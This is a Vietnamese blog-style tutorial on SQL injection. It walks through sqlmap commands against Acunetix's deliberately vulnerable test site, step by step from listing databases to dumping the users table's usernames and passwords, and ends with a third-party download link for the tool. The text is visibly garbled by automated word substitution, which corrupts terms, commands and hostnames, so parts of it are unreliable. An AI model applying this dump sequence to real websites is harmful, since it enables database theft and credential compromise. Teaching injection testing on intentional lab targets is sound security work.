– Lỗ hổng Squốc lộ Injection là một lổ hỏng khá cơ bản và cũng khá nguy hiểm với các webmaster. Do sự thiếu cẩn trọng trong lúc lập trình hoặc không thể kiểm soát và fillter được hết các form để từ đó các script kiddies tận dụng inject vào thực thi query/comm& mà không cần login username/password để remote exdễ thương, dump data, lấy root sqlmáy chủ,..

Bạn đang xem: Sqlmap là gì

2. Tìm điểm yếu của trang web.

– Ta có thể tìm các website mang lại submit dữ liệu ở bất kì một trình tìm kiếm nào trên mạng chẳng hạn như size login, tìm kiếm, feedbaông chồng,bla bla

3. Target và nội dung của bài viết này.

– Đương nhiên đối với lỗi SQL Injection có rất nhiều kiểu khai thác lỗ hỏng, có thể tự query/commvà mà không cần sự hỗ trợ từ phần mềm thứ ba, cũng như sử dụng sqlroot, havij, sqlnija,.. Ở đây chúng ta sẽ sử dụng SQLMAP để thực hiện knhị thác các lỗ hỏng này.

Xem thêm: " Giá Trị Hợp Đồng Tiếng Anh Là Gì ? Giá Trị Hợp Đồng Tiếng Anh Là Gì, Dịch Song Ngữ


.SQLMAPhường. là gì ?

– SQLMAP là công cụ knhị thác những lổ hỏng của cơ sở dữ liệu Squốc lộ. Công cụ này được xem là công cụ knhị thác SQL tốt nhất hiện ni. Được giới bảo mật và giới hacker sử dụng thường xuyên. Với người dùng Kali hoặc Baông chồng Track 5 thì SQLMAP đã được tích hợp sẵn vào hệ điều hành. ( Ảnh Minh Họa )


*
1">
2.Cách Sử Dụng và Lệnh Thực Thi sqlmap

– Chúng ta sẽ thử nhgiệm trên website của Acunetix,đây là Web kiểm tra nên không ảnh hưởng gì tới họ.

http://testphp.vulnweb.com/listproducts.php?cat=1– Để knhị thác được database Web của Acunetix,ta thực hiện lệnh sau:

sqlmaps.py -u ' ' --dbs ví dụ:

sqlmaps.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs– Ta có kết quả là:


*
2">

– Tiếp tục knhị thác tables trong database acuart bằng cú pháp:

sqlmap.py -u ' ' -D acuart --tables

sqlmaps.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables


*
3">

– Sau Lúc có tables ta tiếp tục kiểm tra columns ở đây ta chọn tables users:

sqlbản đồ.py -u ' ' -D acuart -T users --columns

sqlbản đồ.py -u http://testphp.vulnwebsite.com/listproducts.php?cat=1 -D acuart -T users --columns


*
4">

– Cuối cùng ta dump data của columns users:

sqlbản đồ.py -u ' ' -D ' ' -T ' ' -C ' ' --dump

sqlmaps.py -u http://testphp.vulnwebsite.com/listproducts.php?cat=1 -D acuart -T users -C tin nhắn,name,uname,pass --dump


*
5">

– Kết.

Xem thêm: Mã Checksum Là Gì ? Checksum Là Gì (Và Tại Sao Bạn Nên Quan Tâm)

– Bài viết chỉ có tính chất nghiên cứu và tđắm say khảo,mình không khuyến thích các bạn sử dụng mục đích xấu và phạm pháp.– Link Down: http://www.mediafire.com/file/alzfdjco6k5cumh/sqlmaps.rar


Chuyên mục: KHÁI NIỆM LÀ GÌ
Bài viết liên quan

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *